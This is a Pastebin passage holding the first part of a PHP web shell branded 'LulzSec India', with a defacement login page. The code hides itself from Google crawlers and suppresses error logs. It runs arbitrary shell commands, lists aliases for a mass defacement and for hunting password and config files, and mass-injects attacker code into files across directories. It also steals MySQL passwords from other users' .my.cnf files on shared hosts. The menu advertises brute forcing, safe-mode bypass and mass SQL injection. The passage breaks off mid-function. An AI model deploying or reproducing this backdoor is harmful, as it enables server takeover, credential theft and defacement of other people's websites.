GDATTACKER

secret shell

Feb 13th, 2017
813
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 185.35 KB | None | 0 0
  1. <?php
  2. $auth_pass = "21410bd18c1ce46be4bd060d9635cbaa";
  3. $color = "white;text-shadow:blue 0px 0px 10px";
  4. $default_action = 'FilesMan';
  5. @define('SELF_PATH', __FILE__);
  6. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
  7. header('HTTP/1.0 404 Not Found');
  8. exit;
  9. }
  10. @session_start();
  11. @error_reporting(0);
  12. @ini_set('error_log',NULL);
  13. @ini_set('display_errors',0);
  14. @ini_set('log_errors',0);
  15. @ini_set('max_execution_time',0);
  16. @set_time_limit(0);
  17. @set_magic_quotes_runtime(0);
  18. @define('VERSION', 'Ver 5.0');
  19. if( get_magic_quotes_gpc() ) {
  20. function stripslashes_array($array) {
  21. return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
  22. }
  23. $_POST = stripslashes_array($_POST);
  24. }
  25. function printLogin() {
  26. echo '
  27. <html>
  28. <head>
  29. <title>Mr. Po Panda</title>
  30. <!-- Google Meta -->
  31. <!-- Coded By Mr. Po panda -->
  32. <!--
  33. . /$$ /$$ /$$$$$$
  34. .| $$ | $$ /$$__ $$
  35. .| $$ /$$ /$$| $$ /$$$$$$$$| $$ \__/ /$$$$$$ /$$$$$$$
  36. .| $$ | $$ | $$| $$|____ /$$/| $$$$$$ /$$__ $$ /$$_____/
  37. .| $$ | $$ | $$| $$ /$$$$/ \____ $$| $$$$$$$$| $$
  38. .| $$ | $$ | $$| $$ /$$__/ /$$ \ $$| $$_____/| $$
  39. .| $$$$$$$$| $$$$$$/| $$ /$$$$$$$$| $$$$$$/| $$$$$$$| $$$$$$.$
  40. .|________/ \______/ |__/|________/ \______/ \_______/ \_______/
  41. //Laughing at your security since 2011! -->
  42. <meta name="description" content="Hacked by LulzSec india" />
  43. <meta name="keywords" content="Lulzsec india" />
  44. <meta name="author" content="LulzSec india" />
  45. <meta name="copyright" content="lulzsec india" />
  46. <meta name="application-name" content="Deaface" />
  47.  
  48. </head>
  49. <body bgcolor="black">
  50. <style type="text/css">
  51. #greets {
  52. width: 820px;
  53. border-style: outset; }
  54. #footer { font-size: 9pt; opacity: .7; }
  55. .glow { text-shadow: 0 0 10px #F59700; font-family: "Black Ops One"; }
  56. .blueglow { text-shadow: 0 0 10px #0F6FBD; font-family: "Black Ops One" }
  57. .whiteglow { text-shadow: 0 0 10px #FFFFFF; font-family: "Black Ops One"; } </style>
  58. <center>
  59. <p align="center"><b><font color="Orange" face="stencil" size="10">Hacked By LulzSec India</b></font></p>
  60. <p align="center"><b><font color="white" face="stencil" size="6">Did it for india .
  61. <br/>Your Website is Owned By us <br/></font></p>
  62. <p align="center"><b><font color="white" face="Times New Roman" size="6"> Security Failed </font></p>
  63.  
  64. <pre style="color:#56AD15;text-shadow:blue 0px 0px 10px">
  65. ..................................................................
  66. ../$$................./$$............/$$$$$$......................
  67. .| $$................| $$.........../$$__ $$.....................
  68. .| $$......./$$ /$$| $$ /$$$$$$$$| $$ \__/../$$$$$$ /$$$$$$$.
  69. .| $$......| $$ | $$| $$|____ /$$/| $$$$$$../$$__ $$ /$$_____/.
  70. .| $$......| $$ | $$| $$.../$$$$/..\____ $$| $$$$$$$$| $$.......
  71. .| $$......| $$ | $$| $$../$$__/../$$ \ $$||$$_____/.| $$.......
  72. .| $$$$$$$$| $$$$$$/| $$ /$$$$$$$$| $$$$$$/| $$$$$$$| $$$$$$$.
  73. .|________/.\______/.|__/|________/.\______/..\_______/.\_______/.
  74. .......................//Laughing at your security since 2011! -->
  75.  
  76. </pre>
  77.  
  78. <p align="center"><b><font color="white" face="Times New Roman" size="6"> <small>LulzSec india was here</small> </font></p>
  79. <pre style="color:white">
  80. New Security Comes with New vulnerability
  81. - LulzSec india
  82. </pre>
  83. <h3 style="color:white"><u>Team Member</u></h3>
  84. <div id="greets">
  85. <marquee class="glow" style="color:white";>|Mr. Po Panda | Hexking | Drag00n | Gabber Hexor | Vampi | All indian Hackers |</marquee>
  86. </div>
  87. </center>
  88. </body>
  89. </html>
  90.  
  91. <style>input { margin:5;background-color:#000;border:none;color:#0000; cursor:arrow; }</style>
  92. <center><form method=post><input type=password name=pass></form>
  93. </body>
  94. ';
  95. exit;
  96. }
  97. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  98. if( empty( $auth_pass ) ||
  99. ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
  100. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  101. else
  102. printLogin();
  103. if( strtolower( substr(PHP_OS,0,3) ) == "win" )
  104. $os = 'win';
  105. else
  106. $os = 'nix';
  107. $safe_mode = @ini_get('safe_mode');
  108. $disable_functions = @ini_get('disable_functions');
  109. $home_cwd = @getcwd();
  110. if( isset( $_POST['c'] ) )
  111. @chdir($_POST['c']);
  112. $cwd = @getcwd();
  113. if( $os == 'win') {
  114. $home_cwd = str_replace("\\", "/", $home_cwd);
  115. $cwd = str_replace("\\", "/", $cwd);
  116. }
  117. if( $cwd[strlen($cwd)-1] != '/' )
  118. $cwd .= '/';
  119. if($os == 'win') {
  120. $aliases = array(
  121. "Mass Deface" => 'for /r "%cd%" %i in (.) do @copy "%cd%\Lulzsec.html" "%i"',
  122. "Find index.php in current dir" => "dir /s /w /b index.php",
  123. "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
  124. "Show active connections" => "netstat -an",
  125. "Show running services" => "net start",
  126. "User accounts" => "net user",
  127. "Show computers" => "net view",
  128. "ARP Table" => "arp -a",
  129. "IP Configuration" => "ipconfig /all"
  130. );
  131. } else {
  132. $aliases = array(
  133. "List dir" => "ls -la",
  134. "list file attributes on a Linux second extended file system" => "lsattr -va",
  135. "show opened ports" => "netstat -an | grep -i listen",
  136. "Find" => "",
  137. "find all suid files" => "find / -type f -perm -04000 -ls",
  138. "find suid files in current dir" => "find . -type f -perm -04000 -ls",
  139. "find all sgid files" => "find / -type f -perm -02000 -ls",
  140. "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
  141. "find config.inc.php files" => "find / -type f -name config.inc.php",
  142. "find config* files" => "find / -type f -name \"config*\"",
  143. "find config* files in current dir" => "find . -type f -name \"config*\"",
  144. "find all writable folders and files" => "find / -perm -2 -ls",
  145. "find all writable folders and files in current dir" => "find . -perm -2 -ls",
  146. "find all service.pwd files" => "find / -type f -name service.pwd",
  147. "find service.pwd files in current dir" => "find . -type f -name service.pwd",
  148. "find all .htpasswd files" => "find / -type f -name .htpasswd",
  149. "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
  150. "find all .bash_history files" => "find / -type f -name .bash_history",
  151. "find .bash_history files in current dir" => "find . -type f -name .bash_history",
  152. "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
  153. "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
  154. "Locate" => "",
  155. "locate httpd.conf files" => "locate httpd.conf",
  156. "locate vhosts.conf files" => "locate vhosts.conf",
  157. "locate proftpd.conf files" => "locate proftpd.conf",
  158. "locate psybnc.conf files" => "locate psybnc.conf",
  159. "locate my.conf files" => "locate my.conf",
  160. "locate admin.php files" =>"locate admin.php",
  161. "locate cfg.php files" => "locate cfg.php",
  162. "locate conf.php files" => "locate conf.php",
  163. "locate config.dat files" => "locate config.dat",
  164. "locate config.php files" => "locate config.php",
  165. "locate config.inc files" => "locate config.inc",
  166. "locate config.inc.php" => "locate config.inc.php",
  167. "locate config.default.php files" => "locate config.default.php",
  168. "locate config* files " => "locate config",
  169. "locate .conf files"=>"locate '.conf'",
  170. "locate .pwd files" => "locate '.pwd'",
  171. "locate .sql files" => "locate '.sql'",
  172. "locate .htpasswd files" => "locate '.htpasswd'",
  173. "locate .bash_history files" => "locate '.bash_history'",
  174. "locate .mysql_history files" => "locate '.mysql_history'",
  175. "locate .fetchmailrc files" => "locate '.fetchmailrc'",
  176. "locate backup files" => "locate backup",
  177. "locate dump files" => "locate dump",
  178. "locate priv files" => "locate priv"
  179. );
  180. }
  181. function ex($in) {
  182. $out = '';
  183. if (function_exists('exec')) {
  184. @exec($in,$out);
  185. $out = @join("\n",$out);
  186. } elseif (function_exists('passthru')) {
  187. ob_start();
  188. @passthru($in);
  189. $out = ob_get_clean();
  190. } elseif (function_exists('system')) {
  191. ob_start();
  192. @system($in);
  193. $out = ob_get_clean();
  194. } elseif (function_exists('shell_exec')) {
  195. $out = shell_exec($in);
  196. } elseif (is_resource($f = @popen($in,"r"))) {
  197. $out = "";
  198. while(!@feof($f))
  199. $out .= fread($f,1024);
  200. pclose($f);
  201. }else return " Unable to execute command BC\n";
  202. return ($out==''?" Query did not return anything Bro\n":$out);
  203. }
  204. function which($p) {
  205. $path = ex('which ' . $p);
  206. if(!empty($path))
  207. return $path;
  208. return false;
  209. }
  210. function printHeader() {
  211. if(empty($_POST['charset']))
  212. $_POST['charset'] = "UTF-8";
  213. global $color;
  214. echo '<html><head><meta http-equiv="Content-Type" content="text/html; charset='.$_POST['charset'].'"><title>Mr. Po Panda '.VERSION.'</title>
  215. <style>
  216. body {background:url(http://store.picbg.net/pubpic/92/39/36c9def2012c9239.jpg); color:#C3C3C3;}
  217. body,td,th { font: 9pt Lucida,Verdana;margin:0;vertical-align:top; }
  218. span,h1,a { color:'.$color.' !important; }
  219. span { font-weight: bolder; }
  220. h1 { padding: 2px 5px;font: 14pt Verdana;margin:0px 0 0 5px; }
  221. div.content { padding: 5px;margin:0 5px;background: #000000;border-bottom:1px #56A3E9;}
  222. a { text-decoration:none; }
  223. a:hover { /*background:lime;*/ }
  224. .ml1 { border:1px #56A3E9;padding:5px;margin:0;overflow: auto; }
  225. .bigarea { width:100%;height:250px;margin-top:5px;}
  226. input, textarea, select { margin:0;color:lime;background-color:#000000;border:1px solid '.$color.'; font: 9pt Monospace,"Courier New"; }
  227. input[type="button"]:hover,input[type="submit"]:hover {background-color:'.$color.';color:#000;}
  228. form { margin:0px; }
  229. #toolsTbl { text-align:center; }
  230. .toolsInp { width: 80%; }
  231. .main th {text-align:left;background-color:#000000;font-weight: bold;}
  232. .main tr:hover{background-color:#5e5e5e;}
  233. .main td, th{vertical-align:middle;}
  234. .menu {background: #000;}
  235. .menu th{padding:5px;font-weight:bold;}
  236. .menu th:hover{background:#444;}
  237. .l1 {background-color:#000}
  238. pre {font-family:Courier,Monospace;}
  239. #cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);}
  240. .logo {text-align:center;font-size:60px;}
  241. .logo sup {font-size: 15px;vertical-align: top;margin-left: -14px;}
  242. .cpr {margin-bottom:5px;font-weight:bold;}
  243. .cpb {width:34px;margin:0 5px;}
  244. .eca1 {font-size: 16px;font-weight: bold;letter-spacing: 10px;margin: 0 2px 0 17px;text-align: center;}
  245. .eca2 {font-size: 13px;font-weight: bold;letter-spacing: 3px;margin: 0 2px 0 7px;text-align: center;}
  246. .npoad td {padding:0;}
  247. </style>
  248. <script>
  249. function set(a,c,p1,p2,p3,charset) {
  250. if(a != null)document.mf.a.value=a;
  251. if(c != null)document.mf.c.value=c;
  252. if(p1 != null)document.mf.p1.value=p1;
  253. if(p2 != null)document.mf.p2.value=p2;
  254. if(p3 != null)document.mf.p3.value=p3;
  255. if(charset != null)document.mf.charset.value=charset;
  256. }
  257. function g(a,c,p1,p2,p3,charset) {
  258. set(a,c,p1,p2,p3,charset);
  259. document.mf.submit();
  260. }
  261. function a(a,c,p1,p2,p3,charset) {
  262. set(a,c,p1,p2,p3,charset);
  263. var params = "ajax=true";
  264. for(i=0;i<document.mf.elements.length;i++)
  265. params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);
  266. sr("'.$_SERVER['REQUEST_URI'].'", params);
  267. }
  268. function sr(url, params) {
  269. if (window.XMLHttpRequest) {
  270. req = new XMLHttpRequest();
  271. req.onreadystatechange = processReqChange;
  272. req.open("POST", url, true);
  273. req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
  274. req.send(params);
  275. }
  276. else if (window.ActiveXObject) {
  277. req = new ActiveXObject("Microsoft.XMLHTTP");
  278. if (req) {
  279. req.onreadystatechange = processReqChange;
  280. req.open("POST", url, true);
  281. req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
  282. req.send(params);
  283. }
  284. }
  285. }
  286. function processReqChange() {
  287. if( (req.readyState == 4) )
  288. if(req.status == 200) {
  289. //alert(req.responseText);
  290. var reg = new RegExp("(\\d+)([\\S\\s]*)", "m");
  291. var arr=reg.exec(req.responseText);
  292. eval(arr[2].substr(0, arr[1]));
  293. }
  294. else alert("Request error!");
  295. }
  296. </script>
  297. <head><body><div style="position:absolute;width:100%;top:0;left:0;"><div style="margin:1px;background:#000;"><div class="content" style="border-top:1px #56A3E9;">
  298. <form method=post name=mf style="display:none;">
  299. <input type=hidden name=a value="'.(isset($_POST['a'])?$_POST['a']:'').'">
  300. <input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">
  301. <input type=hidden name=p1 value="'.(isset($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'">
  302. <input type=hidden name=p2 value="'.(isset($_POST['p2'])?htmlspecialchars($_POST['p2']):'').'">
  303. <input type=hidden name=p3 value="'.(isset($_POST['p3'])?htmlspecialchars($_POST['p3']):'').'">
  304. <input type=hidden name=charset value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
  305. </form>';
  306. $freeSpace = @diskfreespace($GLOBALS['cwd']);
  307. $totalSpace = @disk_total_space($GLOBALS['cwd']);
  308. $totalSpace = $totalSpace?$totalSpace:1;
  309. $disable_functions = @ini_get('disable_functions');
  310. $release = @php_uname('r');
  311. $kernel = @php_uname('s');
  312. $explink = 'http://exploit-db.com/search/?action=search&filter_description=';
  313. if(strpos('Linux', $kernel) !== false)
  314. $explink .= urlencode('Linux Kernel ' . substr($release,0,6));
  315. else
  316. $explink .= urlencode($kernel . ' ' . substr($release,0,3));
  317. if(!function_exists('posix_getegid')) {
  318. $user = @get_current_user();
  319. $uid = @getmyuid();
  320. $gid = @getmygid();
  321. $group = "?";
  322. } else {
  323. $uid = @posix_getpwuid(@posix_geteuid());
  324. $gid = @posix_getgrgid(@posix_getegid());
  325. $user = $uid['name'];
  326. $uid = $uid['uid'];
  327. $group = $gid['name'];
  328. $gid = $gid['gid'];
  329. }
  330. $cwd_links = '';
  331. $path = explode("/", $GLOBALS['cwd']);
  332. $n=count($path);
  333. for($i=0;$i<$n-1;$i++) {
  334. $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
  335. for($j=0;$j<=$i;$j++)
  336. $cwd_links .= $path[$j].'/';
  337. $cwd_links .= "\")'>".$path[$i]."/</a>";
  338. }
  339. $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
  340. $opt_charsets = '';
  341. foreach($charsets as $item)
  342. $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
  343. $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Exec'=>'Console','Infect'=>'Infect','CgiShell'=>'CgiShell','Shared Hostings'=>'Shared','Grab Configs'=>'ConfigGrabber','Safe Mode'=>'Bypass','Sql'=>'Sql','Subdomain'=>'Subdomain','LFI'=>'lfiscan','Brute'=>'Bruteforce','CP' => 'CP','Readable'=>'Readable','Mass Defacer'=>'Deface','Bypass'=>'Defacer','String tools'=>'StringTools','Jumping'=>'Jumping','Injector'=>'Injector','Connect'=>'Network','Port Scanner'=>'PortScanner','R.D.P'=>'rdp','Domain' => 'Domain','Mass SQLi' => 'shiv');
  344. if(!empty($GLOBALS['auth_pass']))
  345. $m['Logout'] = 'Logout';
  346.  
  347. $menu = '';
  348. foreach($m as $k => $v)
  349. $menu .= '<th><a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a></th>';
  350. $drives = "";
  351. if ($GLOBALS['os'] == 'win') {
  352. foreach( range('a','z') as $drive ){
  353. if (is_dir($drive.':\\'))
  354. $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
  355. }
  356. $drives .= '<br />: ';
  357.  
  358. }
  359. if($GLOBALS['os'] == 'nix') {
  360. $dominios = @file_get_contents("/etc/named.conf");
  361. if(!$dominios) {
  362. $d0c = "CANT READ named.conf";
  363. } else {
  364. @preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);
  365. $out = sizeof(array_unique($out[1]));
  366. $d0c = $out." Domains";
  367. }
  368. } else {
  369. $d0c = " --- ";
  370. }
  371. if($GLOBALS['os'] == 'nix' )
  372. {
  373. $usefl = ''; $dwnldr = '';
  374. if(!@ini_get('safe_mode')) {
  375. $temp = array();
  376. $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
  377. foreach($userful as $item) { if(which($item)) $temp[]= $item; }
  378. $usefl = implode(', ',$temp);
  379. $temp = array();
  380. $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
  381. foreach($downloaders as $item2) { if(which($item2)) $temp[]= $item2; }
  382. $dwnldr = implode(', ',$temp);
  383. } else {
  384. $usefl = ' ------- '; $dwnldr = ' ------- ';
  385. }
  386. } else {
  387. $usefl = ' ------- '; $dwnldr = ' ------- ';
  388. }
  389.  
  390. echo '<table class="info" cellpadding="0" cellspacing="0" width="100%" bgcolor="black"><tr><td width="160px"><img src="http://i.giphy.com/l2Sq1rpEhjQpZxczK.gif" height="150" width="150"><sup>&reg;</sup></div></td>
  391. <td><table cellpadding="0" cellspacing="0" class="npoad"><tr><td width="125px;"><span>Uname</span></td><td>: <nobr>'.substr(@php_uname(), 0, 120).' <a href="' . $explink . '" target=_blank>[exploit-db.com]'.'</nobr></td></tr>
  392. <tr><td><span>User</span></td><td>: '.$uid.' ( '.$user.' ) <span>Group: </span> '.$gid.' ( '.$group.' )</td></tr><tr><td><span>Server</span></td><td>: '.@getenv('SERVER_SOFTWARE').'</td></tr><tr><td><span>Useful</span></td><td>: '.$usefl.'</td></tr><tr><td><span>Downloaders</span></td><td>: '.$dwnldr.'</td></tr><tr><td><span>Disabled functions</span></td><td>: '.($disable_functions?$disable_functions:'All Function Enable').'</td></tr><tr><td><span>'.($GLOBALS['os'] == 'win'?'Drives<br />Cwd':'Cwd').'</span></td><td>: '.$drives.''.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a></td></tr></table></td>'.
  393. '<td width=1><nobr><span>Server IP</span><br><span>Client IP</span><br /><span>HDD</span><br /><span>Free</span><br /><span>PHP</span><br /><span>Safe Mode</span><br /><span>Domains</span></nobr></td>'.
  394. '<td><nobr>: '.gethostbyname($_SERVER["HTTP_HOST"]).'<br>: '.$_SERVER['REMOTE_ADDR'].'<br />: '.viewSize($totalSpace).'<br />: '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>: '.@phpversion().' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a><br />: '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color='.$color.'<b>OFF</b></font>').'<br />: '.$d0c.'</nobr></td></tr></table>'.
  395. '</div></div><div style="margin:1;background #000;"><div class="content" style="border-top:1px #56A3E9;padding:2px;"><table cellpadding="3" cellspacing="0" width="100%" class="menu"><tr>'.$menu.'.</tr></table></div></div><div style="margin:2;background:#000;">'
  396. .'<div style="margin:1;background #000;"><div class="content" style="border-top:1px #56A3E9;padding:2px;">';
  397. // menu2 is there but cant set it :(
  398. }
  399.  
  400.  
  401. function actionInjector(){
  402. printHeader();
  403. echo '<center><h1>Mass Code Injector By LulzSec 2016 </h1></center>';
  404. echo '<div class="content">';
  405.  
  406. if(stristr(php_uname(),"Windows")) { $DS = "\\"; } else if(stristr(php_uname(),"Linux")) { $DS = '/'; }
  407. function get_structure($path,$depth) {
  408. global $DS;
  409. $res = array();
  410. if(in_array(0, $depth)) { $res[] = $path; }
  411. if(in_array(1, $depth) or in_array(2, $depth) or in_array(3, $depth)) {
  412. $tmp1 = glob($path.$DS.'*',GLOB_ONLYDIR);
  413. if(in_array(1, $depth)) { $res = array_merge($res,$tmp1); }
  414. }
  415. if(in_array(2, $depth) or in_array(3, $depth)) {
  416. $tmp2 = array();
  417. foreach($tmp1 as $t){
  418. $tp2 = glob($t.$DS.'*',GLOB_ONLYDIR);
  419. $tmp2 = array_merge($tmp2, $tp2);
  420. }
  421. if(in_array(2, $depth)) { $res = array_merge($res,$tmp2); }
  422. }
  423. if(in_array(3, $depth)) {
  424. $tmp3 = array();
  425. foreach($tmp2 as $t){
  426. $tp3 = glob($t.$DS.'*',GLOB_ONLYDIR);
  427. $tmp3 = array_merge($tmp3, $tp3);
  428. }
  429. $res = array_merge($res,$tmp3);
  430. }
  431. return $res;
  432. }
  433.  
  434. if(isset($_POST['submit']) && $_POST['submit']=='Inject') {
  435. $name = $_POST['name'] ? $_POST['name'] : '*';
  436. $type = $_POST['type'] ? $_POST['type'] : 'html';
  437. $path = $_POST['path'] ? $_POST['path'] : getcwd();
  438. $code = $_POST['code'] ? $_POST['code'] : '3xp1r3 Cyber Army';
  439. $mode = $_POST['mode'] ? $_POST['mode'] : 'a';
  440. $depth = sizeof($_POST['depth']) ? $_POST['depth'] : array('0');
  441. $dt = get_structure($path,$depth);
  442. foreach ($dt as $d) {
  443. if($mode == 'a') {
  444. if(file_put_contents($d.$DS.$name.'.'.$type, $code, FILE_APPEND)) {
  445. echo '<div><strong>'.$d.$DS.$name.'.'.$type.'</strong><span style="color:#a3e956;"> was injected</span></div>';
  446. } else {
  447. echo '<div><span style="color:red;">failed to inject</span> <strong>'.$d.$DS.$name.'.'.$type.'</strong></div>';
  448. }
  449. } else {
  450. if(file_put_contents($d.$DS.$name.'.'.$type, $code)) {
  451. echo '<div><strong>'.$d.$DS.$name.'.'.$type.'</strong><span style="color:#a3e956;"> was injected</span></div>';
  452. } else {
  453. echo '<div><span style="color:red;">failed to inject</span> <strong>'.$d.$DS.$name.'.'.$type.'</strong></div>';
  454. }
  455. }
  456. }
  457. } else {
  458. echo '<form method="post" action="">
  459. <table align="center">
  460. <tr>
  461. <td>Directory : </td>
  462. <td><input class="box" name="path" value="'.getcwd().'" size="50"/></td>
  463. </tr>
  464. <tr>
  465. <td class="title">Mode : </td>
  466. <td>
  467. <select style="width: 100px;" name="mode" class="box">
  468. <option value="a">Apender</option>
  469. <option value="w">Overwriter</option>
  470. </select>
  471. </td>
  472. </tr>
  473. <tr>
  474. <td class="title">File Name & Type : </td>
  475. <td>
  476. <input type="text" style="width: 100px;" name="name" value="*"/>&nbsp;&nbsp;
  477. <select style="width: 100px;" name="type" class="box">
  478. <option value="html">HTML</option>
  479. <option value="htm">HTM</option>
  480. <option value="php" selected="selected">PHP</option>
  481. <option value="asp">ASP</option>
  482. <option value="aspx">ASPX</option>
  483. <option value="xml">XML</option>
  484. <option value="txt">TXT</option>
  485. </select></td>
  486. </tr>
  487. <tr>
  488. <td class="title">Code Inject Depth : </td>
  489. <td>
  490. <input type="checkbox" name="depth[]" value="0" checked="checked"/>&nbsp;0&nbsp;&nbsp;
  491. <input type="checkbox" name="depth[]" value="1"/>&nbsp;1&nbsp;&nbsp;
  492. <input type="checkbox" name="depth[]" value="2"/>&nbsp;2&nbsp;&nbsp;
  493. <input type="checkbox" name="depth[]" value="3"/>&nbsp;3
  494. </td>
  495. </tr>
  496. <tr>
  497. <td colspan="2"><textarea name="code" cols="70" rows="10" class="box"></textarea></td>
  498. </tr>
  499. <tr>
  500. <td colspan="2" style="text-align: center;">
  501. <input type="hidden" name="a" value="Injector">
  502. <input type="hidden" name="c" value="'.htmlspecialchars($GLOBALS['cwd']).'">
  503. <input type="hidden" name="p1">
  504. <input type="hidden" name="p2">
  505. <input type="hidden" name="charset" value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
  506. <input style="padding :5px; width:100px;" name="submit" type="submit" value="Inject"/></td>
  507. </tr>
  508. </table>
  509. </form>';
  510. }
  511. echo '</div>';
  512. printFooter();
  513. }
  514.  
  515.  
  516. function actionCP() {
  517.  
  518. printHeader();
  519.  
  520.  
  521. echo "<html>
  522. <style type='text/css'>
  523. body { height: 100%; width: 100%; margin: 0; padding: 0; background-image: url(' ');
  524. <style type='text/css'>
  525. /* Circle Text Styles */
  526. #outerCircleText {
  527. /* Optional - DO NOT SET FONT-SIZE HERE, SET IT IN THE SCRIPT */
  528. font-style: italic;
  529. font-weight: bold;
  530. font-family: 'comic sans ms', verdana, arial;
  531. color: #FFF;
  532. /* End Optional */
  533.  
  534. /* Start Required - Do Not Edit */
  535. position: absolute;top: 0;left: 0;z-index: 3000;cursor: default;}
  536. #outerCircleText div {position: relative;}
  537. #outerCircleText div div {position: absolute;top: 0;left: 0;text-align: center;}
  538. /* End Required */
  539. /* End Circle Text Styles */
  540. </style>
  541.  
  542.  
  543. <center><marquee bgcolor='black' width='30%'><span style='font-size: 25px;'><b>
  544. <span style='color:White;font-family:Iceland;text-shadow:red 0px 0px 5px' 'font-size:='' 20pt;'=''>Powered by LulzSec India</span></marquee></center>
  545. <body>";
  546.  
  547. @ini_set('display_errors',0);
  548. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
  549. $ar0=explode($marqueurDebutLien, $text);
  550. $ar1=explode($marqueurFinLien, $ar0[$i]);
  551. return trim($ar1[0]);
  552. }
  553. echo "<center>";
  554. $d0mains = @file('/etc/named.conf');
  555. $domains = scandir("/var/named");
  556.  
  557. if ($domains or $d0mains)
  558. {
  559. $domains = scandir("/var/named");
  560. if($domains) {
  561. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
  562. $count=1;
  563. $dc = 0;
  564. $list = scandir("/var/named");
  565. foreach($list as $domain){
  566. if(strpos($domain,".db")){
  567. $domain = str_replace('.db','',$domain);
  568. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  569. $dirz = '/home/'.$owner['name'].'/.my.cnf';
  570. $path = getcwd();
  571.  
  572. if (is_readable($dirz)) {
  573. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
  574. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
  575. $password=entre2v2($p,'password="','"');
  576. echo "<tr><td>".$count++."</td><td><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td><td><a href='".$owner['name'].".txt' target='_blank'>Click Here</a></td></tr>";
  577. $dc++;
  578. }
  579.  
  580. }
  581. }
  582. echo '</table>';
  583. $total = $dc;
  584. echo '<br><div class="result">Total Found = '.$total.'</h3><br />';
  585. echo '</center>';
  586. }else{
  587. $d0mains = @file('/etc/named.conf');
  588. if($d0mains) {
  589. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
  590. $count=1;
  591. $dc = 0;
  592. $mck = array();
  593. foreach($d0mains as $d0main){
  594. if(@eregi('zone',$d0main)){
  595. preg_match_all('#zone "(.*)"#',$d0main,$domain);
  596. flush();
  597. if(strlen(trim($domain[1][0])) >2){
  598. $mck[] = $domain[1][0];
  599. }
  600. }
  601. }
  602. $mck = array_unique($mck);
  603. $usr = array();
  604. $dmn = array();
  605. foreach($mck as $o) {
  606. $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
  607. $usr[] = $infos['name'];
  608. $dmn[] = $o;
  609. }
  610. array_multisort($usr,$dmn);
  611. $dt = file('/etc/passwd');
  612. $passwd = array();
  613. foreach($dt as $d) {
  614. $r = explode(':',$d);
  615. if(strpos($r[5],'home')) {
  616. $passwd[$r[0]] = $r[5];
  617. }
  618. }
  619. $l=0;
  620. $j=1;
  621. foreach($usr as $r) {
  622. $dirz = '/home/'.$r.'/.my.cnf';
  623. $path = getcwd();
  624. if (is_readable($dirz)) {
  625. copy($dirz, ''.$path.'/'.$r.'.txt');
  626. $p=file_get_contents(''.$path.'/'.$r.'.txt');
  627. $password=entre2v2($p,'password="','"');
  628. echo "<tr><td>".$count++."</td><td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
  629. $dc++;
  630. flush();
  631. $l=$l?0:1;
  632. $j++;
  633. }
  634. }
  635. }
  636. echo '</table>';
  637. $total = $dc;
  638. echo '<br><div class="result">Total Found = '.$total.'</h3><br />';
  639. echo '</center>';
  640.  
  641. }
  642. }else{
  643. echo "<h3><div class='result'><i><font style='color:White;font-family:Iceland;text-shadow:blue 0px 0px 5px'>ERROR</font><br><font style='color:White;font-family:Iceland;text-shadow:blue 0px 0px 5px'>/var/named</font> or <font style='color:White;font-family:Iceland;text-shadow:blue 0px 0px 5px'>etc/named.conf</font> Not Accessible!</i></div></h3>";
  644. echo "<h3><div class='result'><i><font style='color:White;font-family:Iceland;text-shadow:blue 0px 0px 5px'>Lulzsec India </font></h3>";
  645.  
  646. }
  647. printFooter();
  648. }
  649.  
  650. function actionBruteforce() {
  651. printHeader();
  652. if( isset($_POST['proto']) ) {
